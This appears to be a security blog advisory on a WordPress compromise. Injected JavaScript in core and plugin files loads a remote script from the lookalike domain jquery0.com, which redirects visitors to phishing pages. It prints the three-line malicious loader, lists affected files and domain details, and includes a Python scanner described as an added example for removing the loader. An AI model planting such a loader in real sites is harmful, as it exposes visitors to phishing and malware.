
Fix Fake jQuery Redirection to Scam Domain Visitors to jquery0.com

Written by Anuraag Singh ~ Modified: 28-12-2022 ~ Cyber Tip ~ 6 Minutes Reading

A new infection has been detected on several WordPress sites. It can be executed through a malicious script that comes from a domain known as https://jquery0[.]com/JkrJYcvQ

If you have Norton antivirus installed and updated with the latest definitions, it will flag any attempt to open this website.

[Screenshot: Norton alert for jquery0.com]

At first glance, this domain looks like it could be authentic. In reality, the attackers chose the domain name deliberately to trick webmasters: it looks and functions almost exactly like the official website of the widely used JavaScript library jQuery, https://jquery.com

When site visitors see the well-known jQuery name in the requests, they can get the impression that it’s okay to load the content. Regrettably, the domain in question is not the genuine one, and it behaves maliciously. Phishing and spam campaigns frequently use this strategy to deceive victims into believing that the resources in question are genuine.

First things first, let’s have a look at the injection.

JavaScript injection exploits jquery0[.]com

During analysis of the infection, it was discovered that genuine WordPress core, theme, and plugin JavaScript files had the following script injected at the top:

var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);

Let’s have a look at what this three-line piece of code is doing and break it down.

  1. To begin, the code creates a brand-new script tag and sets its src attribute to the address https://jquery0.com/JkrJYcvQ.
  2. Next, it appends that tag to the currently displayed page, which makes the browser fetch and run the script.
  3. The final step of the injection is the execution of the script located at https://jquery0.com/JkrJYcvQ, which redirects users to fraudulent websites.

This injection has been discovered in a variety of different WordPress files, including the following, for instance:

  • wp-includes/js/jquery/ui/effect-transfer.min.js
  • wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js
  • wp-includes/js/jquery/jquery.min.js
  • wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
  • wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js
  • wp-content/themes/exhibz/core/parallax/assets/js/jarallax.js
  • wp-includes/js/dist/vendor/wp-polyfill.min.js
  • wp-content/plugins/popup-builder/public/js/PopupConfig.js
  • wp-content/plugins/gravityforms/js/gravityforms.min.js
  • wp-content/plugins/buddypress/bp-core/js/jquery-query.min.js
  • wp-content/plugins/showit/public/js/showit.js

Investigating the potentially harmful website jquery0[.]com

Let’s take a more in-depth look at the malicious domain used in the script described above.

The WHOIS information for https://jquery0.com reveals a good deal about the domain.

[Screenshot: WHOIS record for jquery0.com]


In light of these findings, we can deduce the following:

  • The domain name was acquired only recently (July 04, 2022).
  • The site uses CloudFlare, which is frequently utilised by cybercriminals.
  • The domain only uses CloudFlare for its name servers; it does not make use of the CloudFlare firewall in any capacity. The IP address 62.233.50.75, located on a Russian CHANGWAY-AS network, can be looked up directly at https://urlscan.io/ip/62.233.50.75.

Redirects Links to Fraudulent Online Pages

End users are tricked into providing their personal information by being led to fraudulent websites as soon as the malicious script has run in their browser. For instance, one of the variants offers the following hoax giveaway for an Apple iPhone 13 Pro:

[Screenshot: fake iPhone 13 Pro giveaway page]

When the victim clicks the “Ok” button, they are taken to a page where sensitive personal information is collected from them.

[Screenshot: phishing form collecting personal information]

The use of a sense of urgency and a deadline is a typical tactic employed by cybercriminals on phishing websites in an effort to coerce potential victims into making a snap decision to provide their sensitive information.

However, this particular con is just one of many conceivable permutations that may be attempted. MalwareBytes has just recently discovered that this domain is also connected to the malware campaigns known as FakeUpdates and SocGholish.

Steps to Clean Website from JQuery0.com Infection

Once an attacker has acquired unauthorized access to a website, one of the most common tactics that they will take is to inject malicious scripts into the JS files and the files that make up WordPress.

In most cases the JS folders containing JavaScript .js files are infected, and you will see the script at the top of the .js file.

Remove the script below from the JS files.

var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);
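The following Python script is an added example, not part of the original article, showing how a site owner can locate and strip the three-line loader from a WordPress tree. It matches the loader generically (any variable name, plain or defanged jquery0 host), so it also catches variants where the attacker renamed khutmhpx; the sample file content is constructed for the demonstration.

```python
import re
from pathlib import Path

# Matches the loader described in the article: a createElement('script') whose
# src points at jquery0.com, followed by appendChild into <head>. The variable
# name is captured and back-referenced so renamed variants are caught too;
# "\[?\.\]?" accepts both jquery0.com and the defanged jquery0[.]com spelling.
INJECT_RE = re.compile(
    r"var\s+(\w+)\s*=\s*document\.createElement\(['\"]script['\"]\);\s*"
    r"\1\.src\s*=\s*['\"]https?://jquery0\[?\.\]?com/[^'\"]*['\"];\s*"
    r"document\.getElementsByTagName\(['\"]head['\"]\)\[0\]\.appendChild\(\1\);\s*"
)

def find_injection(js_text: str):
    """Return the matched loader text if the file is infected, else None."""
    m = INJECT_RE.search(js_text)
    return m.group(0) if m else None

def clean_js(js_text: str) -> str:
    """Strip every occurrence of the loader, leaving the legitimate code intact."""
    return INJECT_RE.sub("", js_text)

def scan_tree(root: Path, fix: bool = False):
    """Walk a WordPress install and list infected .js files; rewrite them if fix=True.
    Keep a backup of the site before running with fix=True."""
    hits = []
    for path in root.rglob("*.js"):
        try:
            text = path.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue
        if find_injection(text):
            hits.append(path)
            if fix:
                path.write_text(clean_js(text), encoding="utf-8")
    return hits

# Constructed sample: the loader prepended to a (shortened) legitimate file.
SAMPLE_INFECTED = (
    "var khutmhpx = document.createElement('script');\n"
    "khutmhpx.src = 'https://jquery0.com/JkrJYcvQ';\n"
    "document.getElementsByTagName('head')[0].appendChild(khutmhpx);\n"
    "/*! jQuery v3.6.0 */ !function(e,t){e.jQuery=t}(window,{});\n"
)

if __name__ == "__main__":
    print("infected:", find_injection(SAMPLE_INFECTED) is not None)
    print(clean_js(SAMPLE_INFECTED), end="")
    for hit in scan_tree(Path("."), fix=False):   # dry run over the current directory
        print("infected file:", hit)
```

Run it with fix=False first to review the list of affected files, then with fix=True on a backed-up copy; any file that still loads from jquery0 after cleaning likely carries a variant the pattern does not cover and should be inspected by hand.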

These scripts, which will fool end users into handing out their personal information, can be well disguised within the files that make up the core of WordPress as well as the files that make up plugins.

There are a lot of precautions you can take to safeguard your website from JavaScript injections, which may be broken down into three categories:

  • Make sure that your website’s plugins, themes, and software are all up to date. Always apply the most recent patch to get the most up-to-date protection against known software vulnerabilities.
  • Conduct routine scans for malicious software and backdoors. This entails doing scans at both the server and client levels in order to detect any potentially harmful injections, SEO spam, or backdoors that might be hiding on your website.
  • Always use a different password for each of your online accounts. This includes the login credentials for sFTP, database, and cPanel users as well as admin users.
  • Keep an eye on your logs for any indications of a security breach. Always keep an eye out for anything that seems odd or fishy, and give serious consideration to installing a file integrity monitoring system on your website.
  • Invest in a web application firewall (WAF). Firewalls can help reduce the impact of malicious bots, protect against brute-force attacks, and identify intrusion attempts in your environment.

And if you feel that harmful scripts have been inserted into your site or that it has been compromised in any way, we are here to assist you. If you contact our customer care team for assistance, we will be able to remove the malware on your behalf.